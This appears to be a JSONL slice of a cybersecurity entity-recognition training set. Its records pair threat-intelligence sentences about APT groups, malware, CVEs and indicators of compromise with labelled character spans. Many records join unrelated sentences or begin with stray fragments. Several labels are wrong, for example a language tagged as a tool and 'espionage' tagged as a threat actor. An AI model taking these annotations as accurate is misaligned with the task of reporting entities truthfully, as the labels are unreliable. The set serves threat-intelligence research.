{"text": "This helps the C2 define what actions it can do before being detected on the mobile device . Primarily focused on governments and military operations of countries with interests in the South China Sea , Moafee likely chooses its targets based on region 's rich natural resources . ShadowHammer : 141.105.71.116 . The first , CVE-2022 - 41123 , has been revealed by ZDI to be DLL hijacking3 due to the loading of a non - existent component by a privileged executed command .", "spans": {"ORGANIZATION: governments": [[114, 125]], "THREAT_ACTOR: Moafee": [[203, 209]], "THREAT_ACTOR: ShadowHammer": [[281, 293]], "IP_ADDRESS: 141.105.71.116": [[296, 310]], "VULNERABILITY: CVE-2022 - 41123": [[325, 341]], "VULNERABILITY: DLL hijacking3": [[375, 389]]}, "info": {"id": "cyberner_stix_train_007773", "source": "cyberner_stix_train"}}
{"text": "It was made clear during communications that INDRIK SPIDER is not willing to negotiate on the ransom amount , explicitly stating that the victim can use multiple Bitcoin exchanges to obtain the number of BTC required , and the exchange rate should be calculated based on the rate posted on the cryptocurrency exchange Bittrex . The ScarCruft APT gang has made use of a Flash zero day patched Thursday by Adobe to attack more than two dozen high-profile targets in Russia and Asia primarily .", "spans": {"ORGANIZATION: communications": [[25, 39]], "ORGANIZATION: cryptocurrency": [[294, 308]], "TOOL: Flash": [[369, 374]], "VULNERABILITY: zero day": [[375, 383]]}, "info": {"id": "cyberner_stix_train_007774", "source": "cyberner_stix_train"}}
{"text": "The menus for PlugX 's server-side component are written exclusively in Standard Chinese ( Mandarin ) , suggesting that PlugX operators are familiar with this language .", "spans": {"MALWARE: PlugX": [[14, 19], [120, 125]], "TOOL: Standard Chinese": [[72, 88]], "TOOL: Mandarin": [[91, 99]]}, "info": {"id": "cyberner_stix_train_007775", "source": "cyberner_stix_train"}}
{"text": "All encrypted archives can be divided into two groups : the first comprises Game321.res , Game322.res , Game323.res and Game642.res – and these are used in the initial phase of infection , while the second group : Game324.res and Game644.res , are used in the main phase . Given the group 's specific interest in infrastructure operations , rapidly improving capabilities , and history of aggressive targeting , Dragos considers this group a primary threat to the ICS industry . Some criminals also sell remote access to these systems , acting as a concierge for other cybercriminals by giving them permanent access to steal new data by themselves . A Polish student used a remote controller device to interface with the Lodz city tram system in Poland .", "spans": {"ORGANIZATION: Dragos": [[412, 418]], "ORGANIZATION: ICS industry": [[464, 476]], "THREAT_ACTOR: Polish student": [[652, 666]], "SYSTEM: a remote controller device": [[672, 698]], "SYSTEM: the Lodz city tram system": [[717, 742]]}, "info": {"id": "cyberner_stix_train_007776", "source": "cyberner_stix_train"}}
{"text": "We have observed this recent wave of Zyklon malware being delivered primarily through spam emails . This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 .", "spans": {"THREAT_ACTOR: Zyklon": [[37, 43]], "TOOL: spam emails": [[86, 97]], "TOOL: emails": [[152, 158]], "FILEPATH: Microsoft Word documents": [[164, 188]], "VULNERABILITY: CVE-2017-0199": [[200, 213]]}, "info": {"id": "cyberner_stix_train_007777", "source": "cyberner_stix_train"}}
{"text": "update.exe module and Xenotix Python Keylogger code comparison ‘ addStartup ’ method from msconf.exe module ‘ addStartup ’ method from Xenotix Python Keylogger Distribution We found several landing pages that spread the Android implants . Whenever users reboot their device or open up Network Speed Master , SWAnalytics will fetch the latest configuration file from http[:]//mbl[.]shunwang[.]com/cfg/config[.]json” . It has previously used newsworthy events as lures to deliver malware and has primarily targeted organizations involved in financial , economic , and trade policy , typically using publicly available RATs such as PoisonIvy , as well as some non-public backdoors .", "spans": {"SYSTEM: Xenotix Python Keylogger": [[22, 46], [135, 159]], "SYSTEM: Android": [[220, 227]], "MALWARE: SWAnalytics": [[308, 319]], "MALWARE: RATs": [[616, 620]], "MALWARE: PoisonIvy": [[629, 638]], "MALWARE: non-public backdoors": [[657, 677]]}, "info": {"id": "cyberner_stix_train_007778", "source": "cyberner_stix_train"}}
{"text": "The lack of any significant evidence of shared code between any of these backdoor families is another clue as to the scope of the resources on which the activity group is able to draw , and the precautions the group is willing and able to take in order to avoid losing its ability to conduct its espionage operations . In this report , we'll review how NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan .", "spans": {"THREAT_ACTOR: activity group": [[153, 167]], "THREAT_ACTOR: group": [[210, 215]], "MALWARE: NetTraveler": [[353, 364]], "VULNERABILITY: exploit": [[378, 385]], "VULNERABILITY: CVE-2012-0158": [[386, 399]], "MALWARE: NetTraveler Trojan": [[415, 433]]}, "info": {"id": "cyberner_stix_train_007779", "source": "cyberner_stix_train"}}
{"text": "Using the C&C server , the attackers then instructed the compromised computer to provide the infected computer ’s IP address , the names of all other computers in the workgroup or domain , and dumps of Windows cached password hashes .", "spans": {"TOOL: C&C": [[10, 13]], "SYSTEM: Windows": [[202, 209]]}, "info": {"id": "cyberner_stix_train_007780", "source": "cyberner_stix_train"}}
{"text": "] qwq-japan [ . Over the past two years , Russia appears to have increasingly leveraged APT28 to conduct information operations commensurate with broader strategic military doctrine . When the send loop has fewer than 60 bytes to send (e.g., a small file or the last part of a file), the send function transmits the remaining bytes with a shorter data . Typically , they steal information , including intellectual property , personally identifying information , and money to fund or further espionage and exploitation causes .", "spans": {"THREAT_ACTOR: APT28": [[88, 93]]}, "info": {"id": "cyberner_stix_train_007781", "source": "cyberner_stix_train"}}
{"text": "PLEAD also uses CVE-2017-7269 , a buffer overflow vulnerability Microsoft Internet Information Services ( IIS ) 6.0 to compromise the victim 's server . ALLANITE activity closely resembles Palmetto Fusion described by the US Department of Homeland Security ( DHS ) .", "spans": {"VULNERABILITY: CVE-2017-7269": [[16, 29]], "ORGANIZATION: Department of Homeland Security": [[225, 256]], "ORGANIZATION: DHS": [[259, 262]]}, "info": {"id": "cyberner_stix_train_007782", "source": "cyberner_stix_train"}}
{"text": "The majority of NewsBeef targets that Kaspersky researchers have observed are located in SA . As Proofpoint has not yet observed this attack in the wild it is likely that there is an additional component that leads to the execution of the MSIL payload .", "spans": {"THREAT_ACTOR: NewsBeef": [[16, 24]], "ORGANIZATION: Kaspersky": [[38, 47]], "ORGANIZATION: Proofpoint": [[97, 107]], "FILEPATH: MSIL payload": [[239, 251]]}, "info": {"id": "cyberner_stix_train_007783", "source": "cyberner_stix_train"}}
{"text": "This was followed by additional details from Kaspersky in a blog post published on 16th July .", "spans": {"ORGANIZATION: Kaspersky": [[45, 54]]}, "info": {"id": "cyberner_stix_train_007784", "source": "cyberner_stix_train"}}
{"text": "One of the differences was a particularly clever evasion technique : to our knowledge this has never been observed in use .", "spans": {}, "info": {"id": "cyberner_stix_train_007785", "source": "cyberner_stix_train"}}
{"text": "] top/ Oct 17 , 2017 hxxp : //online.bankaustria.at.id87726 [ . In some cases , the victims were redirected to these actor-controlled servers displaying the stolen certificate . This group reportedly compromised the Hillary Clinton campaign , the Democratic National Committee , and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election .", "spans": {"THREAT_ACTOR: actor-controlled": [[117, 133]], "TOOL: servers": [[134, 141]], "ORGANIZATION: Democratic National Committee": [[247, 276]], "ORGANIZATION: Democratic Congressional Campaign Committee": [[287, 330]]}, "info": {"id": "cyberner_stix_train_007786", "source": "cyberner_stix_train"}}
{"text": "It seems , however , if the same victim has more than one device the malware can be reused since the IMEI is sent along with each data exfiltration . Further research led us to additional MoonWind samples using the same C2 ( dns.webswindows.com ) but hosted on a different compromised but legitimate website . The WATERSPOUT backdoor was written to the same file path as the HIGHTIDE backdoors : C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\word.exe , C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\winword.exe . Over 5 years ago , we began tracking a new campaign that we called FakeUpdates ( also known as SocGholish ) that used compromised websites to trick users into running a fake browser update .", "spans": {"TOOL: MoonWind samples": [[188, 204]], "TOOL: legitimate website": [[289, 307]], "MALWARE: WATERSPOUT backdoor": [[314, 333]], "MALWARE: HIGHTIDE backdoors": [[375, 393]], "FILEPATH: SETTINGS\\Temp\\word.exe": [[435, 457]], "FILEPATH: SETTINGS\\Temp\\winword.exe": [[499, 524]]}, "info": {"id": "cyberner_stix_train_007787", "source": "cyberner_stix_train"}}
{"text": "These actors scan websites for vulnerabilities to exploit to illicitly access databases . APT10 is known to have exfiltrated a high volume of data from multiple victims , exploiting compromised MSP networks , and those of their customers , to stealthily move this data around the world .", "spans": {"THREAT_ACTOR: actors": [[6, 12]], "THREAT_ACTOR: APT10": [[90, 95]], "MALWARE: MSP networks": [[194, 206]], "ORGANIZATION: customers": [[228, 237]]}, "info": {"id": "cyberner_stix_train_007788", "source": "cyberner_stix_train"}}
{"text": "A university class student list including the C & C domain registrant Due to poor privacy practices on the part of our culprit ’ s university , we now know his date of birth ( probably : he seemingly used his birth year as part of his Gmail address , as further partial confirmation ) , we know that he was a student and what university he attended . Figure 1 shows a sample phishing email used by HawkEye operators in this latest campaign . File type: PE32 executable (GUI) Intel 80386 , for MS Windows .", "spans": {"SYSTEM: Gmail": [[235, 240]], "MALWARE: phishing email": [[375, 389]], "ORGANIZATION: MS Windows": [[493, 503]]}, "info": {"id": "cyberner_stix_train_007789", "source": "cyberner_stix_train"}}
{"text": "The targeted individuals did not follow any significant pattern , and the email addresses were found easily using web search engines .", "spans": {"TOOL: email": [[74, 79]]}, "info": {"id": "cyberner_stix_train_007790", "source": "cyberner_stix_train"}}
{"text": "At the same time , it 's extremely flexible , making it a very effective tool for malicious actors . Further analysis of the BITTER APT’s infrastructure uncovered a broader phishing campaign targeting other government sites and state-owned enterprises in China . APT33 registered multiple domains that masquerade as Saudi Arabian aviation companies and Western organizations that together have partnerships to provide training , maintenance and support for Saudi 's military and commercial fleet .", "spans": {"THREAT_ACTOR: BITTER APT’s": [[125, 137]], "ORGANIZATION: government sites": [[207, 223]], "ORGANIZATION: enterprises": [[240, 251]], "THREAT_ACTOR: APT33": [[263, 268]], "ORGANIZATION: aviation companies": [[330, 348]]}, "info": {"id": "cyberner_stix_train_007791", "source": "cyberner_stix_train"}}
{"text": "] today This is the first version that shows the code organization evolution that will continue to be used on all other functions throughout this malware . Symantec telemetry identified Cadelle and Chafer activity dating from as far back as July 2014 , however , it's likely that activity began well before this date . Both backdoors were dropped from malicious documents built utilizing the “ Tran Duy Linh ” exploit kit , which exploited CVE-2012-0158 . BADCALL communicates on ports 443 and 8000 with a FakeTLS method.[6 ] Bankshot binds and listens on port 1058 for HTTP traffic while also utilizing a FakeTLS method.[7 ] BendyBear has used a custom RC4 and XOR encrypted protocol over port 443 for C2.[8 ]", "spans": {"ORGANIZATION: Symantec": [[156, 164]], "TOOL: Tran Duy Linh": [[394, 407]], "VULNERABILITY: CVE-2012-0158": [[440, 453]], "MALWARE: BADCALL": [[456, 463]], "MALWARE: Bankshot": [[526, 534]], "MALWARE: BendyBear": [[626, 635]]}, "info": {"id": "cyberner_stix_train_007792", "source": "cyberner_stix_train"}}
{"text": "After the profile is downloaded , the iOS system will first ask users to review the profile in their settings if they want to install it . On November 26 , 2015 , a suspected China-based APT16 sent Japanese defense policy-themed spear phishing emails to multiple Japanese financial and high-tech companies . The malware sends another TXT query with the receiver . The new year is almost upon us , and 2022 has been a game of ransomware hardball .", "spans": {"SYSTEM: iOS": [[38, 41]], "THREAT_ACTOR: APT16": [[187, 192]], "ORGANIZATION: financial": [[272, 281]], "ORGANIZATION: high-tech companies": [[286, 305]]}, "info": {"id": "cyberner_stix_train_007793", "source": "cyberner_stix_train"}}
{"text": "] infoacount-manager [ . Attacks using this tool were still active as of April 2016 . WEBC2 variants may include a server component that provides a simple C2 interface to the intruder . For Greatness specifically , anyone implementing multi - factor authentication should opt for code - based authentication through their MFA app of choice , such as Cisco Duo , rather than the easier - to - break method of a simple “ yes ” or “ no ” push notification .", "spans": {"MALWARE: WEBC2": [[86, 91]], "TOOL: C2": [[155, 157]], "SYSTEM: Cisco Duo": [[350, 359]]}, "info": {"id": "cyberner_stix_train_007794", "source": "cyberner_stix_train"}}
{"text": "This separate malware was installed by an unknown attack as “ AppData\\Local\\Microsoft\\Windows\\msdeltemp.dll ” ( md5: CE8B99DF8642C065B6AF43FDE1F786A3 ) .", "spans": {"FILEPATH: AppData\\Local\\Microsoft\\Windows\\msdeltemp.dll": [[62, 107]], "FILEPATH: CE8B99DF8642C065B6AF43FDE1F786A3": [[117, 149]]}, "info": {"id": "cyberner_stix_train_007795", "source": "cyberner_stix_train"}}
{"text": "We found 280 such apps in the past three months . Our analysis of this malware shows that it belongs to Hussarini , also known as Sarhust , a backdoor family that has been used actively in APT attacks targeting countries in the ASEAN region since 2014 . This group was previously tracked under two distinct groups , APT34 and OilRig , but was combined due to additional reporting giving higher confidence about the overlap of the activity .", "spans": {"MALWARE: Hussarini": [[104, 113]], "THREAT_ACTOR: APT34": [[316, 321]], "THREAT_ACTOR: OilRig": [[326, 332]]}, "info": {"id": "cyberner_stix_train_007796", "source": "cyberner_stix_train"}}
{"text": "In June and August 2019 , BRONZE PRESIDENT delivered PlugX via government and law enforcement-themed phishing lures .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[26, 42]], "MALWARE: PlugX": [[53, 58]]}, "info": {"id": "cyberner_stix_train_007797", "source": "cyberner_stix_train"}}
{"text": "During our investigation , we observed the C2 server sending multiple “ balance ” commands to different institutions , presumably to query the victim ’ s financial account balances . The OilRig group ( AKA APT34 , Helix Kitten ) is an adversary motivated by espionage primarily operating in the Middle East region . Moreover , this kind of infrastructure uses HTTPS and the flow is encrypted that makes man-in-the-middle interception more complicated for the defender . Indicators of attack are similar to IOCs , but rather than focusing on forensic analysis of a compromise that has already taken place , indicators of attack focus on identifying attacker activity while an attack is in process .", "spans": {"THREAT_ACTOR: OilRig group": [[187, 199]], "THREAT_ACTOR: APT34": [[206, 211]], "THREAT_ACTOR: Helix Kitten": [[214, 226]], "THREAT_ACTOR: espionage": [[258, 267]]}, "info": {"id": "cyberner_stix_train_007798", "source": "cyberner_stix_train"}}
{"text": "There the user is prompted to download and install a Trojan imitating an Adobe Flash Player update . Turla is a notorious group that has been targeting governments . We will continue to monitor new activities of the Winnti Group and will publish relevant information on our blog . Revenge intrinsic Disgruntled employees or former employees are those that typically commit the lions share of revengebased cyberattacks .", "spans": {"SYSTEM: Adobe Flash Player": [[73, 91]], "THREAT_ACTOR: Turla": [[101, 106]], "ORGANIZATION: governments": [[152, 163]], "THREAT_ACTOR: Winnti Group": [[216, 228]]}, "info": {"id": "cyberner_stix_train_007799", "source": "cyberner_stix_train"}}
{"text": "A graphical representation of the data structure used to store each VM opcode The VM handler is completely able to generate different code blocks and deal with relocated code due to address space layout randomization ( ASLR ) . Magic Hound has primarily targeted organizations in the energy , government , and technology sectors that are either based or have business interests in Saudi Arabia . Payload Samples ( Win32/Winnti.AG ) Surprisingly enough , it does not take very long to get some information about Hack520 : someone with this handle runs a blog and a Twitter account ( with a handle close to Hack520 ) that is also directly linked to the blog .", "spans": {"ORGANIZATION: energy": [[284, 290]], "ORGANIZATION: government": [[293, 303]], "ORGANIZATION: technology sectors": [[310, 328]], "FILEPATH: Win32/Winnti.AG": [[414, 429]], "THREAT_ACTOR: Hack520": [[511, 518], [605, 612]], "TOOL: Twitter": [[564, 571]]}, "info": {"id": "cyberner_stix_train_007800", "source": "cyberner_stix_train"}}
{"text": "At this point we had collected nearly thirty samples of Zebrocy in relation to the original sample and its associated C2 domain .", "spans": {"MALWARE: Zebrocy": [[56, 63]], "TOOL: C2": [[118, 120]]}, "info": {"id": "cyberner_stix_train_007801", "source": "cyberner_stix_train"}}
{"text": "It ’ s interesting that Triout , which is detected by Bitdefender ’ s machine learning algorithms , was first submitted from Russia , and most scans/reports came from Israel . Spam emails targeting email accounts used in the integrated mail service of public officials were also found in the hacking activity . Existing telemetry indicates that the Carbanak attackers are trying to expand operations to other Baltic and Central Europe countries , the Middle East , Asia and Africa .", "spans": {"MALWARE: Triout": [[24, 30]], "ORGANIZATION: Bitdefender": [[54, 65]], "MALWARE: Carbanak": [[349, 357]], "THREAT_ACTOR: attackers": [[358, 367]]}, "info": {"id": "cyberner_stix_train_007802", "source": "cyberner_stix_train"}}
{"text": "With much of our research , our initial direction and discovery of emerging threats is generally some combination of previously observed behavioral rulesets or relationships .", "spans": {}, "info": {"id": "cyberner_stix_train_007803", "source": "cyberner_stix_train"}}
{"text": "The decompiled code shows the decryption routine that unpacks the embedded Spark backdoor .", "spans": {"MALWARE: Spark backdoor": [[75, 89]]}, "info": {"id": "cyberner_stix_train_007804", "source": "cyberner_stix_train"}}
{"text": "So we recommend installing an anti-virus solution on your Android device . At this time , we do not believe that the attackers found a new ASA exploit . The vulnerability exists in the old Equation Editor ( EQNEDT32.EXE ) , a component of Microsoft Office that is used to insert and evaluate mathematical formulas .", "spans": {"ORGANIZATION: we": [[90, 92]], "THREAT_ACTOR: attackers": [[117, 126]], "VULNERABILITY: ASA": [[139, 142]], "VULNERABILITY: exploit": [[143, 150]], "MALWARE: Equation Editor": [[189, 204]], "MALWARE: EQNEDT32.EXE": [[207, 219]], "ORGANIZATION: Microsoft": [[239, 248]]}, "info": {"id": "cyberner_stix_train_007805", "source": "cyberner_stix_train"}}
{"text": "Service , the Achilles ’ heel of Android security 22 May 2020 - 03:00PM ESET researchers have analyzed an extremely dangerous Android app that can perform a host of nefarious actions , notably wiping out the victim ’ s bank account or cryptocurrency wallet and taking over their email or social media accounts . In the past , Sednit used a similar technique for credential phishing . The persistence functionality of KiloAlfa allows the malware to self-install on a victim 's machine when activated ( described below ) .", "spans": {"SYSTEM: Android": [[33, 40], [126, 133]], "ORGANIZATION: ESET": [[72, 76]], "THREAT_ACTOR: Sednit": [[326, 332]], "MALWARE: KiloAlfa": [[417, 425]]}, "info": {"id": "cyberner_stix_train_007806", "source": "cyberner_stix_train"}}
{"text": "Return the translated object .", "spans": {}, "info": {"id": "cyberner_stix_train_007807", "source": "cyberner_stix_train"}}
{"text": "The screenshot below shows SpyNote RAT scanning for Wi-Fi and enabling it if a known channel is found : Additional features - SpyNote RAT could click photos using the device 's camera , based on commands from C & C . Group-IB experts established that the server 185.20.187.89 started functioning no later than 28 January 2019 . Since 2013 , the cybercrime gang have attempted to attack banks , e-payment systems and financial institutions using pieces of malware they designed , known as Carbanak and Cobalt .", "spans": {"MALWARE: SpyNote RAT": [[27, 38], [126, 137]], "ORGANIZATION: Group-IB": [[217, 225]], "THREAT_ACTOR: cybercrime gang": [[345, 360]], "ORGANIZATION: banks": [[386, 391]], "ORGANIZATION: e-payment": [[394, 403]], "ORGANIZATION: financial institutions": [[416, 438]], "MALWARE: Carbanak": [[488, 496]], "MALWARE: Cobalt": [[501, 507]]}, "info": {"id": "cyberner_stix_train_007808", "source": "cyberner_stix_train"}}
{"text": "The espionage group , which according to the U.S. Department of Homeland Security ( DHS ) and the Federal Bureau of Investigation ( FBI ) is linked to the Russian government , returned to low-key intelligence-gathering operations during 2017 and into 2018 , targeting a range of military and government targets in Europe and South America .", "spans": {"ORGANIZATION: Department of Homeland Security": [[50, 81]], "ORGANIZATION: DHS": [[84, 87]], "ORGANIZATION: Federal Bureau of Investigation": [[98, 129]], "ORGANIZATION: FBI": [[132, 135]]}, "info": {"id": "cyberner_stix_train_007809", "source": "cyberner_stix_train"}}
{"text": "APT28 targets Russian rockers and dissidents Pussy Riot via spear-phishing emails . We are confident the Callisto Group used this type of access to a target 's email account for the purposes of sending spear phishing to other targets .", "spans": {"THREAT_ACTOR: APT28": [[0, 5]], "ORGANIZATION: rockers": [[22, 29]], "ORGANIZATION: dissidents": [[34, 44]], "TOOL: email": [[160, 165]]}, "info": {"id": "cyberner_stix_train_007810", "source": "cyberner_stix_train"}}
{"text": "This research led them to believe that the actor using Shamoon in recent attacks relied heavily on weaponized documents built to leverage PowerShell to establish their initial network foothold and subsequent operations :", "spans": {"MALWARE: Shamoon": [[55, 62]], "TOOL: PowerShell": [[138, 148]]}, "info": {"id": "cyberner_stix_train_007811", "source": "cyberner_stix_train"}}
{"text": "ChopShop1 is a new framework developed by the MITRE Corporation for network-based protocol decoders that enable security professionals to understand actual commands issued by human operators controlling endpoints . Technical analysis of COVELLITE malware indicates an evolution from known LAZARUS toolkits .", "spans": {"MALWARE: ChopShop1": [[0, 9]], "ORGANIZATION: MITRE Corporation": [[46, 63]], "MALWARE: COVELLITE": [[237, 246]], "MALWARE: malware": [[247, 254]], "MALWARE: LAZARUS toolkits": [[289, 305]]}, "info": {"id": "cyberner_stix_train_007812", "source": "cyberner_stix_train"}}
{"text": "This division of labor among the cybercriminals can also be seen in the behavior of their Trojans . Due to tools and tactics in use we attribute the campaign to LuckyMouse Chinese-speaking actor ( also known as EmissaryPanda and APT27 ) . Additionally , we published a blog post on a new backdoor named skip-2.0 that targets Microsoft SQL Server . This fact was apparently unknown to Biderman and other Ashley Madison executives more than a year later when their July 2015 hack was first revealed .", "spans": {"THREAT_ACTOR: LuckyMouse": [[161, 171]], "THREAT_ACTOR: EmissaryPanda": [[211, 224]], "THREAT_ACTOR: APT27": [[229, 234]], "MALWARE: backdoor": [[288, 296]], "MALWARE: skip-2.0": [[303, 311]], "TOOL: Microsoft SQL Server": [[325, 345]], "ORGANIZATION: Biderman": [[384, 392]], "ORGANIZATION: Ashley Madison executives": [[403, 428]]}, "info": {"id": "cyberner_stix_train_007813", "source": "cyberner_stix_train"}}
{"text": "Like other Zebrocy samples , this Trojan collects system specific information it will send to the C2 server by running the command SYSTEMINFO & TASKLIST on the command line and by enumerating information about connected storage devices .", "spans": {"MALWARE: Zebrocy": [[11, 18]], "MALWARE: Trojan": [[34, 40]], "TOOL: C2": [[98, 100]]}, "info": {"id": "cyberner_stix_train_007814", "source": "cyberner_stix_train"}}
{"text": "This blog covers the changes , improvements , and Indicators of Compromise (IOC) of Ploutus-D in order to help financial organizations identify and defend against this threat . Barium has targeted Microsoft customers both in Virginia , the United States , and around the world .", "spans": {"MALWARE: Ploutus-D": [[84, 93]], "ORGANIZATION: financial": [[111, 120]], "THREAT_ACTOR: Barium": [[177, 183]], "ORGANIZATION: Microsoft customers": [[197, 216]]}, "info": {"id": "cyberner_stix_train_007815", "source": "cyberner_stix_train"}}
{"text": "In February , PINCHY SPIDER released version 5.2 of GandCrab , which is immune to the decryption tools developed for earlier versions of GandCrab and in fact , was deployed the day before the release of the latest decryptor . Symantec has to date discovered 49 different organizations in more than 20 countries that have been attacked by Butterfly .", "spans": {"THREAT_ACTOR: PINCHY SPIDER": [[14, 27]], "TOOL: GandCrab": [[52, 60], [137, 145]], "ORGANIZATION: Symantec": [[226, 234]]}, "info": {"id": "cyberner_stix_train_007816", "source": "cyberner_stix_train"}}
{"text": "Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 . In early 2018 , multiple media claimed that Turla operators used mail attachments to control infected machines .", "spans": {"MALWARE: malicious Word documents": [[21, 45]], "VULNERABILITY: Windows OLE Automation Array Remote Code Execution Vulnerability": [[74, 138]], "VULNERABILITY: CVE-2014-6332": [[150, 163]], "ORGANIZATION: media": [[191, 196]], "THREAT_ACTOR: Turla": [[210, 215]]}, "info": {"id": "cyberner_stix_train_007817", "source": "cyberner_stix_train"}}
{"text": "The infected app steals contacts and SMS messages from the user ’ s device and asks for admin permissions . Financially motivated APT groups which focus efforts on targeted attacks on the financial sector such as — Anunak , Corkow , Buhtrap — usually managed botnets using developed or modified banking Trojans . This threat actor stole suspected of stealing €13 million from Bank of Valetta , Malta earlier this year . Monitor for changes made to files that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"ORGANIZATION: financial sector": [[188, 204]], "TOOL: Corkow": [[224, 230]], "ORGANIZATION: banking": [[295, 302]]}, "info": {"id": "cyberner_stix_train_007818", "source": "cyberner_stix_train"}}
{"text": "Tactic #1: Delivering the miner directly to a vulnerable serverSome tactics we've observed involve exploiting CVE-2017-10271 , leveraging PowerShell to download the miner directly onto the victim’s system (Figure 1) , and executing it using ShellExecute() . The ScarCruft APT gang has made use of a Flash zero day patched Thursday by Adobe to attack more than two dozen high-profile targets in Russia and Asia primarily .", "spans": {"VULNERABILITY: CVE-2017-10271": [[110, 124]], "TOOL: PowerShell": [[138, 148]], "TOOL: Flash": [[299, 304]], "VULNERABILITY: zero day": [[305, 313]]}, "info": {"id": "cyberner_stix_train_007819", "source": "cyberner_stix_train"}}
{"text": "The overlay consisted of a generic credit card grabber targeting social and utility apps , such as Google Play , Facebook , WhatsApp , Chrome , Skype , Instagram and Twitter . The Honeycomb toolserver receives exfiltrated information from the implant; an operator can also task the implant to execute jobs on the target computer , so the toolserver acts as a C2 (command and control) server for the implant . Tick Group Continues Attacks .", "spans": {"SYSTEM: Google Play": [[99, 110]], "SYSTEM: Facebook": [[113, 121]], "SYSTEM: WhatsApp": [[124, 132]], "SYSTEM: Chrome": [[135, 141]], "SYSTEM: Skype": [[144, 149]], "SYSTEM: Instagram": [[152, 161]], "SYSTEM: Twitter": [[166, 173]], "MALWARE: Honeycomb": [[180, 189]], "THREAT_ACTOR: Tick": [[409, 413]]}, "info": {"id": "cyberner_stix_train_007820", "source": "cyberner_stix_train"}}
{"text": "When using email scams , SilverTerrier actors preferred to use large target audiences , which maximized the likelihood of success with very little risk . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including embassies .", "spans": {"THREAT_ACTOR: SilverTerrier actors": [[25, 45]], "MALWARE: Epic Turla": [[175, 185]], "ORGANIZATION: embassies": [[264, 273]]}, "info": {"id": "cyberner_stix_train_007821", "source": "cyberner_stix_train"}}
{"text": "] 711231 [ . APT28 spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware . This campaign has been discussed at a high level by other researchers publicly . None LIGHTWORK is a disruption tool written in C++ that implements the IEC-104 protocol to modify the state of RTUs over TCP .", "spans": {"THREAT_ACTOR: APT28": [[13, 18]], "VULNERABILITY: Flash exploits": [[62, 76]], "TOOL: Carberp": [[94, 101]], "TOOL: JHUHUGIT downloaders": [[108, 128]], "TOOL: LIGHTWORK": [[247, 256]], "TOOL: disruption tool": [[262, 277]], "TOOL: C++": [[289, 292]]}, "info": {"id": "cyberner_stix_train_007822", "source": "cyberner_stix_train"}}
{"text": "Svpeng does this to check if the cards from these banks are attached to the number of the infected phone and to find out the account balance . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including government institutions . Winnti : C&C : w[org_name].dnslookup.services : 443 . Analysis into the malware and its functionality reveals that its capabilities are comparable to those employed in previous incidents and malware , such as and , which were both malware variants deployed in the past to impact electricity transmission and distribution via IEC-104 .", "spans": {"MALWARE: Svpeng": [[0, 6]], "TOOL: Epic Turla": [[164, 174]], "ORGANIZATION: government institutions": [[253, 276]], "THREAT_ACTOR: Winnti": [[279, 285]], "TOOL: C&C": [[288, 291]], "URL: w[org_name].dnslookup.services": [[294, 324]]}, "info": {"id": "cyberner_stix_train_007823", "source": "cyberner_stix_train"}}
{"text": "COBALT GYPSY 's continued social media use reinforces the importance of recurring social engineering training . we identified two methods to deliver the KerrDown downloader to targets .", "spans": {"THREAT_ACTOR: COBALT GYPSY": [[0, 12]], "ORGANIZATION: social media": [[26, 38]], "ORGANIZATION: social engineering": [[82, 100]], "FILEPATH: KerrDown": [[153, 161]]}, "info": {"id": "cyberner_stix_train_007824", "source": "cyberner_stix_train"}}
{"text": "] com . If it did , the malware downloaded additional modules , including ones allowing for the automatic creation of unauthorized payment orders , changing details in legal payment orders , etc . Upon installation , the malware starts communicating with one of its C&C servers . We will continue to monitor these campaigns and in particular SocGholish to see if the web delivery landscape changes .", "spans": {"TOOL: C&C": [[266, 269]], "MALWARE: SocGholish": [[342, 352]]}, "info": {"id": "cyberner_stix_train_007825", "source": "cyberner_stix_train"}}
{"text": "GlobeImposter is another ransomware strain that saw relatively small-scale distribution until TA505 began including it in malicious spam campaigns at the end of July 2017 .", "spans": {"MALWARE: GlobeImposter": [[0, 13]], "THREAT_ACTOR: TA505": [[94, 99]]}, "info": {"id": "cyberner_stix_train_007826", "source": "cyberner_stix_train"}}
{"text": "This is most probably how the application spreads . Symantec has found evidence of Starloader files being named AdobeUpdate.exe , AcrobatUpdate.exe , and INTELUPDATE.EXE among others . The Leafminer 's post-compromise toolkit suggests that Leafminer is looking for email data , files , and database servers on compromised target systems .", "spans": {"ORGANIZATION: Symantec": [[52, 60]], "MALWARE: Starloader files": [[83, 99]], "MALWARE: AdobeUpdate.exe": [[112, 127]], "MALWARE: AcrobatUpdate.exe": [[130, 147]], "MALWARE: INTELUPDATE.EXE": [[154, 169]], "THREAT_ACTOR: Leafminer": [[189, 198], [240, 249]], "TOOL: email": [[265, 270]]}, "info": {"id": "cyberner_stix_train_007827", "source": "cyberner_stix_train"}}
{"text": "As with many other attackers who use spear-phishing to infect victims , Scarlet Mimic makes heavy use of \" decoy \" files . The majority of APT37 activity continues to target South Korea , North Korean defectors , and organizations and individuals involved in Korean Peninsula reunification efforts .", "spans": {"THREAT_ACTOR: attackers": [[19, 28]], "THREAT_ACTOR: Scarlet Mimic": [[72, 85]], "ORGANIZATION: defectors": [[201, 210]]}, "info": {"id": "cyberner_stix_train_007828", "source": "cyberner_stix_train"}}
{"text": "Hanieh_will_remain_abroad_and_Hamas_steps_up_in_Gaza.exe :", "spans": {"FILEPATH: Hanieh_will_remain_abroad_and_Hamas_steps_up_in_Gaza.exe": [[0, 56]]}, "info": {"id": "cyberner_stix_train_007829", "source": "cyberner_stix_train"}}
